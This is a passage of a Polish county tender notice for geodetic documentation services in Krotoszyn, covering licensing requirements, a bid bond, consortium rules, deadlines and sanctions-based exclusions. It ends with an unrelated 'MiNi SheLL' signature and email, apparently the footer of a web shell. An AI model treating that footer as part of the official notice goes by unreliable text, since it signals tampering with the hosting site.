inwentaryzacyjne<br/>(1) oraz rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych (2), wydane<br/>na mocy Rozporządzenia Ministra Rozwoju z dnia 28 lipca 2020 r. w sprawie uprawnień zawodowych w dziedzinie geodezji<br/>(Dz.U. z 2020 r. poz. 1321 ze zmianami) w związku z art. 45 „h” ustawy z dnia 17 maja 1989 r. - Prawo geodezyjne i<br/>kartograficzne (t.j. Dz. U. z 2024 r. poz. 1151.)- zgodnie z Załącznikiem Nr 7 do SWZ.<br/>Ocena spełniania przedmiotowego warunku zostanie dokonana na podstawie złożonego wykazu osób wg wzoru<br/>stanowiącego załącznik Nr 7 do SIWZ, na zasadzie spełnia – nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z<br/>informacją o podstawie do dysponowania tymi osobami. Wykaz powinien potwierdzać dysponowanie, co najmniej jedną osobą<br/>posiadającą uprawnienia geodezyjne w zakresie 1 i 2 tj.: geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i<br/>inwentaryzacyjne (1) oraz rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych<br/>(2), wydane na mocy Rozporządzenia Ministra Rozwoju z dnia 28 lipca 2020 r. w sprawie uprawnień zawodowych w dziedzinie<br/>geodezji (Dz.U. z 2020 r. poz. 1321 ze zmianami) w związku z art. 45 „h” ustawy z dnia 17 maja 1989 r. - Prawo geodezyjne i<br/>kartograficzne (t.j. Dz. U. z 2024 r. poz. 1151)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy<br/>2) Oświadczenie o podjęciu środków naprawczych –składa wykonawca tylko w przypadku jeżeli go dotyczy<br/>3) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia dotyczące realizacji zakresu przedmiotu<br/>zamówienia przez poszczególnych wykonawców<br/>4) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia<br/>5) Pełnomocnictwa – złożyć jeżeli dotyczy.<br/>6) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci elektronicznej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 300,00 zł (słownie: trzysta złotych 00/100)<br/>2.	Wadium musi obejmować pełen okres związania ofertą tj. od dnia 14.10.2024 r. do dnia 12.11.2024 r.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: PKO BP S.A. Oddział Krotoszyn 79 1020 2267 0000 4802 0004 2440 z adnotacją: (w zależności od składanej oferty na dane zadanie) „Wadium – wykonanie dokumentacji geodezyjnej”. <br/>Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego) tj. do dnia 14.10.2024 r. do godz. 10.00.<br/>5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci elektronicznej podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Powiat Krotoszyński z siedzibą ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn;<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>3)	kwotę gwarancji/poręczenia,<br/>4)	termin ważności gwarancji/poręczenia,<br/>5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8.	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo musi być załączone do oferty.<br/>2. Wszelka korespondencja będzie dokonywana wyłącznie z Wykonawcą występującym jako Pełnomocnik pozostałych.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczeniu,<br/>spełnianiu warunków udziału w postepowaniu składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postepowaniu.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (Załącznik nr 6 do SWZ).<br/>Złożenie oświadczenia, o którym mowa w ust. 4 wynika z konieczności weryfikacji czy planowany podział zadań pomiędzy<br/>członków konsorcjum zapewnia realne wykorzystanie deklarowanych przez wykonawców zasobów potwierdzających<br/>spełnianie warunków udziału w postepowaniu.<br/>5. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte<br/>wykonanie zobowiązania.<br/>6. Formularz oferty musi zawierać wszystkie dane podmiotów składających ofertę wspólną (nazwa adres, nr NIP, REGON<br/>każdego z podmiotów) z wyraźnym wskazaniem pełnomocnika.<br/>7. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje<br/>korespondencję.<br/>8. Przed zawarciem umowy (w przypadku wygrania postępowania) Zamawiający może żądać od Wykonawców składający<br/>ofertę wspólną umowy konsorcjum, zawierającą, co najmniej<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2) wskazanie pełnomocnika i zakresu jego uprawnień,<br/>3) określenie zakresu działania poszczególnych stron umowy,<br/>4) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia, okres odbioru prac<br/>oraz czas trwania gwarancji jakości i rękojmi,<br/>5) wskazanie podmiotu, nr rachunku, na który dokonane zostaną płatności za zrealizowaną usługę, wskazanie sposobu<br/>podziału wynagrodzenia pomiędzy strony umowy,<br/>6) określenie zasad odpowiedzialności stron w przypadku, gdy Zamawiającemu zostanie wyrządzona szkoda; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Poza innymi przypadkami wymienionymi w ustawie, Prawo zamówień publicznych, przewiduje się możliwość zmian<br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy dotyczącą:<br/>1) zmiany Podwykonawców, na zasoby których Wykonawca powoływał się przy wykazywaniu spełniania warunków udziału<br/>w postępowaniu. Zamawiający dopuszcza możliwość zmiany Podwykonawców, pod warunkiem wykazania Zamawiającemu,<br/>iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie<br/>mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_krotoszyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-14 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, w celu przeciwdziałania wspieraniu<br/>agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o<br/>której mowa w art. 2 przedmiotowej ustawy, stosuje się sankcje polegające m.in. na wykluczeniu z postępowania o<br/>udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Prawo zamówień publicznych. Na<br/>podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie<br/>zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:1)Wykonawcę oraz uczestnika<br/>konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego<br/>na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3<br/>ustawy;2)Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca<br/>2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba<br/>wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub<br/>będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w<br/>sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;3)Wykonawcę oraz<br/>uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24<br/>lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy. Wykluczenie, o którym powyżej następować będzie na okres trwania<br/>okoliczności wskazanych powyżej. W przypadku Wykonawcy wykluczonego na podstawie art. 7 ust. 1 ustawy o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, Zamawiający odrzuca ofertę takiego Wykonawcy odpowiednio do trybu stosowanego do<br/>udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego. Jako<br/>sankcję przewidziano również karę pieniężną nakładaną na osoby lub podmioty podlegające wykluczeniu na podstawie art.<br/>7 ust. 1 ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w<br/>postępowaniu o udzielenie zamówienia publicznego. Przy czym, przez ubieganie się o udzielenie zamówienia publicznego<br/>rozumie się złożenie oferty. . Weryfikacji niepodlegania wykluczeniu z postępowania, Zamawiający dokona na podstawie<br/>złożonego przez Wykonawcę wstępnego oświadczenia (załącznik do SWZ) o niepodleganiu wykluczeniu z postępowania<br/>oraz na podstawie informacji zawartej w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014, a<br/>także informacji udostępnionych przez Ministerstwo Spraw Wewnętrznych i Administracji jako lista osób i podmiotów<br/>objętych sankcjami.

Creat By MiNi SheLL
Email: jattceo@gmail.com